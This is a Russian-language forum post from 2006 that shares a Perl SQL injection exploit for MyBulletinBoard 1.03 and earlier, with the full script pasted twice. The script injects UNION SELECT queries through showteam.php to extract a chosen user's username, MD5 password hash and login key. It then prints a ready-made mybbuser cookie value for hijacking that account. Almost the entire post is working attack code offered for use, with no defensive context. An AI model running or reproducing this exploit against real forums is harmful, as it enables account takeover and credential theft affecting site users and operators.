+toxa+
16.02.2006, 00:26
Чё-то это неделя выдалась урожайная на SQL inj сплойты для форумов..... теперь под прицелом оказался MyBulletinBoard <= 1.03
Вот код сплойта
#!/bin/env perl
#//-------------------------------------------------------------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#// http://WwW.SoQoR.NeT #
#//-------------------------------------------------------------#
use LWP::Simple;
print "\n################################################ #####";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n################################################ #####";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n################################################ #####";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
if(!$1)
{
$prefix="mybb_";
}
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,username,null,null,null, null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,password,null,null,null, null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,loginkey,null,null,null, null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}
Вот код сплойта
#!/bin/env perl
#//-------------------------------------------------------------#
#// MyBB Forum SQL Injection Exploit .. By HACKERS PAL #
#// Greets For Devil-00 - Abducter - Almaster - GaCkeR #
#// Special Greets For SG (SecurityGurus) Team And Members #
#// http://WwW.SoQoR.NeT #
#//-------------------------------------------------------------#
use LWP::Simple;
print "\n################################################ #####";
print "\n# MyBB Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0] or !$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] [User ID] #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://mods.mybboard.com/forum/ 1 #";
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n################################################ #####";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - GaCkeR #";
print "\n################################################ #####";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "showteam.php?GLOBALS[]=1&comma=/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/FROM (.*)users u WHERE/;
$prefix=$1;
if(!$1)
{
$prefix="mybb_";
}
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,username,null,null,null, null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
print "\n[+] Table Prefix is : $prefix";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] User Name : $1";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,password,null,null,null, null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "\n[+] Md5 Hash of Password : $1\n";
die("\n[-] Unable to retrieve The Hash of password\n") if(!$1);
print"\n[!] Watch out ... The Cookie Value is comming\n";
$url =
"showteam.php?GLOBALS[]=1&comma=-
2)%20union%20select%20uid,loginkey,null,null,null, null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,null,null,null,null,null,null,null, null,null,null,null,null,null,
null,null,null,1,4%20from%20".$prefix.
"users%20where%20uid=$id/*";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
$page =~ m/<b><i>(.*)<\/i><\/b>/ && print "[+] Cookie [mybbuser] Value:-\n $id"."_"."$1\n";
print "[-] Unable to retrieve Login Key\n" if(!$1);
}